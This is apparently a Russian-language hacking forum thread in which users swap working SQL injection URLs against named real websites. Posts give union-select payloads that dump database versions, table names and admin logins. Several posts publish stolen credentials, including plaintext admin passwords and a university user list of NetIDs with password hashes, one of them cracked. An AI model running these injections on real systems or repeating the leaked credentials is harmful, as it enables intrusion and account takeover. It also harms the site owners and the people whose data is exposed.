Антибоян обновлен, не забываем проверять свои инжекты. Так же обращаю внимание на то что я перенес лист на другой хостинг; http://constant1ne.by.ru/sqls.html - корневой пост отредактирован Отдельное спасибо юзерам z01b и gisTy за помощь
http://www.business.su/kat.php?goroda=-104+union+select+concat_ws(0x3a,version(),user(),database())/* Version:4.0.27-standard User:business_locuser@localhost Database:business_mbase таблички к сожалению не подобрал 2 gangs сюда постим только раскрученные скули...
Может боян... http://www.volnorez.ru/news_comments.php?news_id=-75+union+select+1,2,3,4,user(),5,6/* http://www.geninform.ru/index.php?category_id=-75+union+select+user()/*
http://www.volnorez.ru/news_comments.php?news_id=-75+union+select+1,2,3,4,5,6,table_name+from+information_schema.tables+limit+25,1/* Тут много чего мона наделать =)) --------------------------------------------- www.volnorez.ru/forum/admin/index.php админ: egor пасс : 32167q
Code: [COLOR=Plum]http://www.basketshop.ru/showitem.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,login,pass),18,19,20,21,22,23,24,25+from+gbusers+limit+0,1/*[/COLOR] version() 4.1.22 user() basketsh@localhost database() wwwbasketshopru
www.valvoline.kz и так ... колонок 6 ... Ver : 5.0.26 Перегребаем информейшн_табля и находим только одну интересную таблицу... admin в бд valvoline login: admin pass: library ..... Админка: _http://www.valvoline.kz/admin.php _http://www.valtec.kz/admin.php
ничего толкового выжать не удалось..мож кто наколупает что..)) EDU [email protected]:5.0.15:cilbuilder next.. PHP: aswipe_user NetID:Password pluthe:2a8de84d9bba07bd167538242df1a3c6 plspike:01e1a02dc87a642ef3b6d00cbee39e91 dlnelson:a1f1d2a50abcb2421fee7d509810e153 sebranek:69e332ddfc7042b084a6367ad89b0259 jdickson:9f88e2f040d048435afc7c91ead6c257 hkepler:cb16f5d9fecbae34d999a17652305de1 amkrull:1c06f99ef5c5fcaa140cfb1a363b670d ashuey:0c1e3901334db2be084c9a20ed7dcce2 trina:c89f9f4ef264e22001f9a9c3d72992ef jrober:c69606c5207571c525520256ada5250d jaiton:dfd8f130b46332c4ff46c8316ad2465d pluthe:2a8de84d9bba07bd167538242df1a3c6:fricfrac ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Интернет магазин http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+table_name+from+information_schema.tables+limit+20,1/* НО... Не могу понять почему не работает ничего при запросе http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws(username,password)+from+users/*
_http://www.a-training.ru/news/new.php?id=15+union+select+1,2,3/* version() - 4.0.27-log database() - a-training user() - a-training@localhost _http://www.latfutsal.lv/new.php?id=-489+union+select+1,2,3,4,5,6,7,8/* version() - 4.0.27-l database() - new user() - new@loca _http://www.bukovina.biz.ua/new.php?id=-14+union+select+1,2,3,4,5/* _http://www.creacon.ru/new.php?id=-245+union+select+1,2,3,4,5/* _http://www.adams-motors.ru/new.php?id=-2+union+select+1,2,3/* version() - 5.0.32-Debian_7etch5-log database() - adamsold user() - adamsold@localhost _http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,2%20FROM%20INFORMATION_SCHEMA.TABLES%20/* имена таблиц :
Academicjournals.net жаль.. негмогу получить вывод ( зато ясно что эт 4 версия. поетому и забил ( тут поидее чтото странное.... union и select не опознаны))) хмм.. 20 перебрал и хз....... не уверен что эт иньекция.. Lexeon вот правильная база..... но это сиравно тест.
не работает потому что таблица находится в другой базе.. так определяем название базы и название таблицы... ну а вот собственно и сам выбор из таблицы.. и заметь, что все работает и выводит
ух что я нашел... Code: http://www.snipersister.de/wap/wapmain.php?option=onewsaction=linkid=-1+union+select+1,2,3,convert(aes_decrypt(aes_encrypt(concat(email,0x3a,username,0x3a,password),0x71),0x71),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users-- вывод в цикле всегда радовало это
в антибояне нет www.u10.ru Уязвимость в: Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3') Колонки: http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/* Информация о базе: Версия: 4.1.21-standard Пользователь: u10_u10@localhost
А че недокопать-то.... Code: http://u10.ru/index.php?menu=category&id=-3+union+select+1,convert(concat_ws(0x3a,name,pass),binary)+from+admin--
он весь дырявый. Добро пожаловать в панель администрирования сайтом http://u10.ru/ Сайт разработки бажный..
_http://u10.ru/index.php?menu=category&id=-3+union+select+1,concat(name,char(58),pass)+from+admin+limit+0,1/* http://u10.ru/admin/admin.php
